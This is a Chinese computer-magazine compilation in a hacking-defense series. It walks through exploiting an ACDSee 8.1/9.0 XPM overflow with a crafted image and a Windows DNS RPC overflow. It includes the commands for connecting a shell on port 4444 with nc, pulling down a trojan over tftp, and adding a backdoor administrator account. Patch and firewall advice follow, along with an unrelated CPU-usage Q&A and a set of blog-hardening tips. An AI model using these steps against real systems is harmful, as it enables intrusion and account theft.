利用最新ACDSee图片抓鸡法大曝光

  如果给你一张图片,并告诉你它可以黑你,你首先想到的是不是这张图片捆绑了木马?你会这么想不无道理,因为这种古老的图片抓鸡法大多的变化都是在捆绑木马上,几乎没有打过图片的主意。但是这种全新超隐蔽的图片抓鸡法,在今年9月诞生了,在黑客圈中广为流传。它利用的就是ACDSee软件(8.1和9.0)。在装机时一般都会预装一些常用软件,不少朋友可能就装有ACDSee软件,这样就给了黑客可乘之机。你也许会有疑问,不捆绑木马,图片是怎么黑我的?看完本文,你就全明白了。
隐蔽在ACDSee图片中的黑手
  普通的图片抓鸡法就是在图片上捆绑木马,然后再传播。这种方法虽然还有人用,但是成功率已经不高了,因为很容易第一时间就被发现。
  现在,一种最新的图片抓鸡法正在黑客圈中流传,它的原理就是利用数字图像处理软件ACDSeeID_X.apl插件在处理内部结构错误的XPM文件时,如果部分字符串大于4096字节的话就会触发溢出。
  黑客首先利用最近才在网络上流传的专用工具创建一张特殊图片,接着通过各种方法将该图片发送出去。用户受骗打开了该图片就会激活4444端口,黑客就可以通过溢出上传木马程序。一旦上传的木马程序成功运行后,用户的电脑就会变成“肉鸡”,游戏账号、QQ等就会被盗。
ACDSee是怎样被用来抓鸡的
1.创建特殊图片
  点击开始菜单中的“运行”命令,输入“cmd”打开命令提示符窗口,然后跳转到ACDSee漏洞利用工具的所在目录。wWW.itCOmputeR.cOM.cN首先输入该工具名称查看其使用方法,从中看到该工具有两种使用方法。这里我们输入:xmp 1 test.xmp回车(图1),这样即可创建一张特殊图片。

2.盗取System权限
  首先将图片文件发送出去,当用户双击打开该文件时,就会在远程系统打开4444的端口。现在打开另外一个命令提示符窗口,使用命令“nc -vv 远程IP地址 4444”来进行连接。这时用黑客工具NC就会得到溢出的结果并获得System的权限(图2)。

3.上传木马抓鸡
  现在先准备一个木马程序mm.exe,接着运行Tftpd32来架设一个服务器。点击“设置”按钮设置木马的所在目录以及本机IP地址就可以了。
  现在切换到System权限的命令提示符窗口,直接输入“tftp -i 本地IP get 远程IP mm.exe”即可。上传完成后运行“start mm.exe”命令执行木马程序,连接成功后肉鸡就到手了,以后就可以为所欲为了。
防范技巧
  技巧1:不要随便接收陌生人的任何文件,也不要下载那些不知情的文件。很多人以为只有可疑的应用程序才有危险,实际上任何文件都可能成为黑客入侵的帮手。
  技巧2:将系统中的ACDSee更新到9.1以上版本(8.1和9.0版本的有这个漏洞),或一些经典但较老的软件版本。因为最新的软件版本已经修复了该漏洞,而老的版本并不存在该漏洞。
  技巧3:利用系统自带的网络防火墙或者第三方的网络防火墙,对溢出时利用的4444端口进行封堵。这样就算是漏洞被激活,也不可能被黑客所控制利用。
防抓鸡系列小结
  通过这么多期抓鸡系列的介绍,我们可以看到黑客抓鸡的手法灵活多变,既有利用常用软件溢出抓鸡的,又有通过端口抓鸡的,还有巧用迅雷发布抓鸡的。不管抓鸡方式怎么变,防范的思路基本上变化不大。
  首先要确保各种系统和常用软件漏洞的修补,这段时间很多黑客都在寻找常用软件的漏洞,大家一定要注意常用软件的更新。其次,要及时更新杀毒软件并使用一些查杀木马能力较强的安全工具,如EWIDO(下载地址:http://www.cpcw.com/bzsoft)。最后,一定要记住不放心的文件不打开,不正规的网站不去,提高安全意识。

 
cpu利用率100怎么办   Q:在Windows XP的资源管理器中,用鼠标右键单击一个文件或目录时,cpu利用率迅速增加到100%,计算机运行变得非常缓慢,就像死机一样。关闭快捷菜单后,才能返回正常水平。请问应当如何解决?www.sq120.com推荐文章

  A:可以使用以下两种方法解决该问题:
  方法一:关闭“为菜单和工具提示使用过渡效果”。在“控制面板”内双击“显示”图标,打开“显示 属性”对话框,切换到“外观”标签,然后单击“效果”按钮,清除“为菜单和工具提示使用过渡效果”复选项。最后,依次单击“确定”按钮,保存设置。
  方法二:在使用鼠标右键点击文件或目录前,先使用鼠标左键选择目标文件或目录。然后,再使用鼠标右键弹出快捷菜单。  
如何利用dns漏洞入侵

  DNS 是域名系统 (Domain Name System) 的缩写。大家在上网输入网址时,只有通过域名解析系统解析找到相对应的IP地址才能访问到网站。但是最近微软的Windows 2000和Windows 2003的DNS服务出现了一个级别极高的安全漏洞,如果被黑客成功利用的话,那么我们的上网操作将遇到巨大的麻烦。
  黑客姓名:张均诚
  黑客特长:Windows系统漏洞研究
  使用工具:DNS服务器漏洞利用工具
  黑客自白:最近Windows系统的DNS出现了0day漏洞,自从这个安全漏洞的代码被披露,攻击这个漏洞的Nirbot蠕虫已经出现了各种变体。如果这个漏洞被黑客利用,那么系统就会被黑客完全控制。
DNS漏洞打开系统防线
  Windows DNS如果存在这个漏洞,那么它在工作时,RPC接口如果处理到有非常规的畸形连接请求,就会向外释放管理员权限,让黑客可以利用这种漏洞完全控制系统。黑客可以通过向有这个漏洞的系统发送一个经过特别设计的RPC数据包,就能够获得该系统的管理员权限,远程执行任何指令。
小知识:什么是RPC
  远程过程调用 (RPC) 是一种协议,程序可使用这种协议向网络中的另一台计算机上的程序请求服务。由于使用 RPC 的程序不必了解支持通信的网络协议的情况,因此 RPC 提高了程序的互操作性。
  此前,RPC中也出现过数个漏洞,其中包括导致Blaster蠕虫大爆发的那个漏洞。这一最新的漏洞是一个堆栈溢出漏洞,给微软和Windows用户带来了很大麻烦。
  根据微软发布的消息,Windows XP和Windows Vista不会受到这一DNS漏洞的影响,Windows 2000 Server SP4、Windows Server 2003 SP1、Windows Server 2003 SP2则存在这一漏洞。
轻松利用DNS漏洞
  打开系统的命令提示符,接着跳转到DNS服务器漏洞利用工具所在的命令,然后执行该漏洞利用工具(图1)。

  在该漏洞的利用程序中执行命令:dns.exe -h 127.0.0.1 -t 1 -p 445,因为我是在本地计算机上进行测试的,所以其中的IP地址为127.0.0.1,而且需要根据服务器版的语言设置参数。当利用工具提示溢出成功以后,就可以利用telnet命令或程序nc连接存在漏洞的服务器中的4444端口,比如telnet 127.0.0.1 4444(图2)。需要说明的是,该工具的成功率并不是特别的高,所以在测试的时候需要多进行几次。
  当我们成功利用漏洞进行溢出以后,就可以在命令行输入:net user pcw 1234 /add,回车确定后如果显示命令成功,就说明已经成功添加了一个用户名为pcw、密码为1234的用户。
  然后我们再在命令行输入:net localgroup administrators pcw /add,如果成功执行的话,就表示将该用户已经添加到管理员组(图3)。

  现在只要利用Windows系统自带的远程桌面功能,接着连接到该DNS服务器的IP地址,然后利用我们刚刚创建的用户名进行登录,就可以进行适时远程管理操作了(图4)。

  如果远程服务器没有开通终端服务功能,也可以通过溢出得到的命令提示符窗口,用FTP或Tftp命令上传我们的木马程序,这样也可以进行有效的远程管理操作。
漏洞危害大,不可不防
  由于这个安全漏洞影响到Windows 2000 Server和Windows Server 2003服务器软件,而且每一种语言版本的Windows服务器都要有一个补丁。微软提供的补丁地址为:http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx,请根据自己的情况选择对应的补丁。
  同时,建议管理员采取如下措施以降低威胁程度。首先打开注册表编辑器,找到以下注册表位置HKEY_LOCAL_MACH INE\SYSTEM\CurrentControlSet\Services\ DNS\Parameters,通过右键菜单新建一个名为“RpcProtocol”的DWORD项目,然后双击新建的值并将该值的数据更改为4,最后重启DNS服务更改生效即可。
破解第20期《轻松拿下OBlog博客系统》攻击招数
  本周,一共有200位读者发来了破解第20期《轻松拿下OBlog博客系统》的招数。我们根据大家的破招描述和效果,最后评出来自广州的李国森为最佳防御者,他将获得50元的奖励,同时,还可再参加年度最佳防御者的评选。
别碰我的博客
  1. 根据OBlog系统提示安装漏洞补丁,注意事项查看http://www.oblog.cn/oblog/Oblogshow.htm。
  2. 更改js.asp的文件名,但其他页面的相应连接也会变成新文件名,还可以备份一个假的js.asp和数据库。
  3. 更换管理员页面的名字与位置。这是一个基本方法,但很管用。当然,网站不能设置成支持目录浏览。
  4. 把管理密码设得尽量复杂,位数也更长一点,且没什么意义最好,这样MD5破解网站的数据库时就不可能组合出你的密码。